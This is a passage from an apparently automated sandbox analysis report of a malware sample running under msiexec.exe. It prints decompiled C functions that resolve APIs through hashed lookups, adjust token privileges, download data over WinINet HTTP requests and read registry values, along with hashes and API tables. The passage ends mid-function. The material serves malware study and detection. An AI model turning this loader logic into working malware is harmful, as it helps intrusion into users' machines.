Instruction Fuzzy Hash: 84414837B005245BEB18CE18DCE06BF77EAEBD5361B16813EE8199B740C678AD06C6C4

Uniqueness

Uniqueness Score: -1.00%

Function 004429D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004429D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -4577739
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -4576867
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -4577690
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x004429d7
0x004429df
0x004429e1
0x004429e5
0x004429f0
0x004429f5
0x00442a01
0x00442a17
0x00442a1f
0x00442a2b
0x00442a2b
0x00442a31
0x00442a34
0x00442a37
0x00442a3d
0x00442a41
0x00442a43
0x00442a43
0x00442a4b
0x00442a51
0x00442a53
0x00442a57
0x00442a59
0x00442a5c
0x00442a62
0x00442a6f
0x00442a81

APIs

DeleteDC.GDI32(-0045DD33), ref: 004429E5
SetWindowPos.USER32(-0045DD33,00447BEC,00000191,00447BEC,00447BEC,00447BEC,00000191), ref: 00442A1F
ResetEvent.KERNEL32(-0045D663,?,00447BEC,-00461FA0,-041C1D33,-00461D33,?,00449287,-00461D33,?,004477A1,00000001,?,-00461D33,?,00446A74), ref: 00442A4B
CreateDIBSection.GDI32(-0045D99A,-0045D99A,-0045D9CB,-0045D663,-0045D9CB,-0045D9CB), ref: 00442A6F

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: e00d37cbedac3cd0cd40a7803a4c42caef35dfabc13ac2cce4d7ed2a6a403386
Instruction ID: 7a15cd910b3a6a642e49634541b5e8e055f57fec240bea8a2de96a30dc5098ea
Opcode Fuzzy Hash: e00d37cbedac3cd0cd40a7803a4c42caef35dfabc13ac2cce4d7ed2a6a403386
Instruction Fuzzy Hash: 86112B73B002247FD7244A5ADD49EDBBA5EE7C9710B060136FC49EB250E5B06F05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00507E85, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00507EA9

Part of subcall function 00507CD4: __fltout2.LIBCMT ref: 00507CFE

__cftog_l.LIBCMT ref: 00507ECF
__cftoe_l.LIBCMT ref: 00507F01

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 06686286e5d74e45a0e53cb606251dc5e57e559fb5daa1f8c9a2b081bb5c1c11
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 8301403280814EBBCF165E94CC45CEE3F26BF1C394B588455FE1859171D736EAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 0050993B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00508537: __getptd_noexit.LIBCMT ref: 00508538
Part of subcall function 00508537: __amsg_exit.LIBCMT ref: 00508545

__amsg_exit.LIBCMT ref: 00509967
__lock.LIBCMT ref: 00509977
InterlockedDecrement.KERNEL32(?), ref: 00509994
InterlockedIncrement.KERNEL32(0051F598), ref: 005099BF

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: bd50f392509388a9df73bccff0930dee49a4ca21d26eb3d8e4aed6247a16e53e
Instruction ID: 0ab6fcd39ce2d48298921ad60c53d561e12fac2042dd392aaaf3b122cc908e51
Opcode Fuzzy Hash: bd50f392509388a9df73bccff0930dee49a4ca21d26eb3d8e4aed6247a16e53e
Instruction Fuzzy Hash: EA01C032D00712EBD720AF649849B9D7F60BF58710F014919F818676D6CB34A981DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00508400, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0051CB9C,0051DD60,0000000C,00508512,00000000,00000000,?,005088F8,?,00000001,?,0050B00B,00000018,0051DE68,0000000C,0050B09A), ref: 00508411
InterlockedIncrement.KERNEL32(0051F170), ref: 0050846C
__lock.LIBCMT ref: 00508474
___addlocaleref.LIBCMT ref: 00508493

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: HandleIncrementInterlockedModule___addlocaleref__lock
String ID:
API String ID: 2801583907-0
Opcode ID: 6920eade9385ab5e86268c0957eb1d656d065c63beb130eda356c480fed63655
Instruction ID: 982dbeef7441e1ac76f6fc988b0d10c2c775a6b40986be804dd2f382005fbdfd
Opcode Fuzzy Hash: 6920eade9385ab5e86268c0957eb1d656d065c63beb130eda356c480fed63655
Instruction Fuzzy Hash: 56115E709407029EEB20EF75C84ABAABFE0FF44314F508929E4A9972D1CBB59984CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 2740 Parent PID: 1776 msiexec.exeCOMMON

Executed Functions

Function 000E9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000E9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E000DBF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E000DBF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E000DBF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E000D9D50(0x647400a5);
						E000DBF50(_t59, _t26, E000D9D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E000DBF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E000DBF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E000D9D50(0x647400a5);
					_t34 = E000DBF50(_t57, _t32, E000D9D50(0x6b5f7e12));
					_t36 = E000D55C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000e9ca0
0x000e9cb1
0x000e9cb6
0x000e9cb9
0x000e9cbb
0x000e9cc4
0x000e9cc6
0x000e9cc8
0x000e9d0a
0x000e9d10
0x000e9d1f
0x000e9d29
0x000e9d2e
0x000e9d35
0x000e9d37
0x000e9d39
0x000e9d8e
0x000e9d8e
0x000e9d8e
0x000e9d3b
0x000e9d40
0x000e9d59
0x000e9d5e
0x000e9d70
0x000e9d72
0x000e9d74
0x00000000
0x000e9d76
0x000e9d7d
0x000e9d82
0x000e9d85
0x000e9d87
0x000e9d89
0x000e9d89
0x000e9d74
0x000e9d97
0x000e9da2
0x000e9cca
0x000e9ccf
0x000e9ce8
0x000e9cfa
0x000e9cff
0x000e9d02
0x000e9d04
0x000e9da6
0x000e9da6
0x00000000
0x00000000
0x00000000
0x000e9d04
0x000e9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000E9D70

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: f4c11f273fe8c95a9de9c677c0c0e36ac4e6a47c91d6fcfa66264891efa99fb6
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: EE21F3A2E443597AEB6036F1AC03FFE3558DB51715F0A0035FD18B52C7FA91AA1485B2

Uniqueness

Uniqueness Score: -1.00%

Function 000D1AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000D1AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000EB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E000DBF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000D55C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E000DB570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000D22E0(_t67, _t51 + _t54 + E000D9D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E000DB570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E000DBF50(_t63, 0, E000D9D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x000d1af9
0x000d1afc
0x000d1b04
0x000d1b14
0x000d1b17
0x000d1b19
0x000d1b1c
0x000d1b1e
0x000d1b48
0x000d1b48
0x000d1b48
0x000d1b4e
0x000d1b5a
0x000d1b5f
0x000d1b62
0x000d1b64
0x00000000
0x00000000
0x000d1b6d
0x000d1b72
0x000d1b75
0x000d1b86
0x000d1b8a
0x00000000
0x00000000
0x000d1b8c
0x000d1b8f
0x000d1b91
0x000d1b97
0x000d1b9c
0x000d1b9f
0x000d1ba1
0x000d1bed
0x000d1bf0
0x000d1bf2
0x000d1c03
0x00000000
0x000d1c0b
0x000d1bf7
0x000d1bf9
0x00000000
0x000d1bfc
0x000d1bba
0x000d1bbf
0x000d1bc5
0x00000000
0x00000000
0x000d1bc7
0x000d1bc9
0x000d1bcb
0x000d1bcd
0x00000000
0x00000000
0x000d1bd3
0x000d1bd8
0x000d1bdb
0x000d1be3
0x00000000
0x000d1be3
0x000d1b20
0x000d1b30
0x000d1b35
0x000d1b3b
0x000d1b3d
0x000d1b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 000D1B86

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: 421dcfed5b511f279f9669e861e3f9caa2c5b4e9f175af51e62b2d00034a07cf
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: 8631A9B5D0030A6BDB10DA94EC42BFF77A5AF50315F154027F90567342FB71991587B2

Uniqueness

Uniqueness Score: -1.00%

Function 000DBA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000DBA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000E5000(_a20, _t60, 0xffffffff);
				E000DBF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E000D9D50(0x647400a5);
					E000DBF50(_t61, _t26, E000D9D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000D55C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E000D1460(__eflags, _t39, 4);
							_t34 = E000D8290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E000DBF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E000DB570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E000DBF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x000dba66
0x000dba70
0x000dba78
0x000dba90
0x000dba95
0x000dbaa1
0x000dbaa3
0x000dbaa8
0x000dbaaa
0x000dbab0
0x000dbab3
0x000dbabf
0x000dbad8
0x000dbadd
0x000dbaf1
0x000dbaf3
0x000dbaf5
0x000dbafe
0x000dbb04
0x000dbb09
0x000dbb0c
0x000dbb0e
0x000dbb10
0x000dbb18
0x000dbb21
0x000dbb26
0x000dbb29
0x000dbb2b
0x00000000
0x000dbb2d
0x000dbb2d
0x000dbb36
0x000dbb3b
0x000dbb4e
0x000dbb50
0x000dbb52
0x000dbb5f
0x000dbb61
0x000dbb54
0x000dbb55
0x000dbb5a
0x00000000
0x000dbb5a
0x000dbb52
0x000dbb2b
0x000dbaf7
0x000dbaf7
0x000dbaf7
0x000dbaf7
0x000dbb6b
0x000dbb70
0x000dbb76
0x000dbb76
0x000dbb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 000DBAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000DBAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000DBB4E
RegCloseKey.KERNEL32(?), ref: 000DBB76

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: 6518c5f46fa939d64d806c787253f9c2b581572346844d8467ec5ea2e062c49b
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: D231B5B2900315BBEB109E64EC42FEE3758AF15764F0A0125FD18663D3F771AA1086F2

Uniqueness

Uniqueness Score: -1.00%

Function 000EBAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000EBAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E000D3750(_t125, E000D20A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000EED80( &_v48, _t126, E000DD0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000EFCF0( &_v48);
				_v32 = 0;
				_t43 = E000D9D50(0x647400bf);
				E000DBF50(_t126, _t43, E000D9D50(0x6f9f943d));
				_t47 = E000DD0A0( &_v65, 0xf04e6,  &_v65);
				_t90 =  ==  ? 0xf0779 : 0xf07f4;
				_t51 = E000DD0A0( &_v204,  ==  ? 0xf0779 : 0xf07f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000EEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E000DBF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E000D9D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E000D9D50(0x647400bf);
						_t74 = E000DBF50(_t85, _t72, E000D9D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E000DBF50(_t131, 0x13, 0xb157a91);
				_t57 = E000DD0A0( &_v97, 0xf0880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					_t59 = E000DBF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E000DBF50(_t132, 0x13, 0x249c261);
					_t82 = E000D55C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E000D5920( &_v24, _v20, E000D9D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000ebad0
0x000ebaec
0x000ebaf6
0x000ebaf8
0x000ebb1e
0x000ebb2a
0x000ebb2d
0x000ebb39
0x000ebb52
0x000ebb65
0x000ebb7e
0x000ebb89
0x000ebb8e
0x000ebba3
0x000ebba5
0x000ebba9
0x000ebce1
0x000ebce4
0x000ebcf5
0x000ebcf5
0x000ebbaf
0x000ebbb2
0x000ebbb6
0x000ebbb8
0x000ebbba
0x000ebbc1
0x000ebbcf
0x000ebbd4
0x000ebbdd
0x000ebbde
0x000ebbdf
0x000ebbe1
0x000ebbe6
0x000ebc00
0x000ebc00
0x000ebc02
0x000ebc0a
0x000ebc23
0x000ebc28
0x000ebc34
0x000ebc34
0x000ebbe6
0x000ebc3d
0x000ebc50
0x000ebc55
0x000ebc60
0x000ebc62
0x000ebc64
0x000ebccd
0x000ebcd4
0x000ebcdd
0x000ebcdf
0x000ebcdf
0x000ebc66
0x000ebc66
0x000ebc6d
0x000ebc7b
0x000ebca5
0x000ebcb7
0x000ebcbc
0x000ebcc1
0x00000000
0x00000000
0x000ebcc5
0x000ebcc7
0x00000000
0x00000000
0x000ebcc9
0x000ebcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000EBBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000EBC60

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

Strings

HHb?, xrefs: 000EBB0B

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: f005f89d04713aa49341c6776bf659746389fa511f8b370bb44902b4dd030027
Instruction ID: 7ce160e26c0b6737dbe5739b7299b50c67773c0a8ed13b82984cdd999a0ea268
Opcode Fuzzy Hash: f005f89d04713aa49341c6776bf659746389fa511f8b370bb44902b4dd030027
Instruction Fuzzy Hash: A051A6B2D403196BEB10ABA0EC52FFF76689B50704F050135FE18B6347FB616A1587B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000E1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E000DBF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000D55C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000E8F20(_a4, E000D9D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E000DBF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E000DBF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E000DBF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E000DBF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E000D9D50(0x647400af);
					_t29 = E000DBF50(_t50, _t27, E000D9D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E000DBF50(_t50, 0, E000D9D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E000DBF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000e1ea3
0x000e1eab
0x000e1eba
0x000e1ebf
0x000e1ec4
0x000e1ec7
0x000e1ec9
0x000e1faa
0x000e1fbb
0x000e1fc3
0x00000000
0x000e1fc3
0x000e1ed6
0x000e1edf
0x000e1ee8
0x000e1eed
0x000e1ef0
0x000e1efc
0x000e1f00
0x000e1f07
0x000e1f09
0x000e1f0b
0x00000000
0x00000000
0x000e1f14
0x000e1f1d
0x000e1f26
0x000e1f2b
0x000e1f2f
0x000e1f31
0x000e1f33
0x00000000
0x00000000
0x000e1f3a
0x000e1f53
0x000e1f5c
0x000e1f6e
0x000e1f73
0x000e1f73
0x000e1f78
0x000e1f80
0x00000000
0x00000000
0x000e1f88
0x000e1f98
0x000e1f9d
0x000e1fa4
0x000e1fa6
0x000e1fa8
0x00000000
0x000e1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000E1EBA

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000E1F07

Strings

{, xrefs: 000E1F78

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: a945d0d3d44f895f25ceb511d9fd24b6f39b890b776607c304308bd0f57312a9
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: 452191B5E803497AF62032B1AC13FFA31589F6174AF060035FD0C7428BFAA5AB5844B3

Uniqueness

Uniqueness Score: -1.00%

Function 000DBCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000DBCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000E9AC0(__eflags, 0xffffffff); // executed
				_t4 = E000D7DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E000D9D50(0x647400a4);
				_t8 = E000DBF50(_t3 - _t4, _t6, E000D9D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
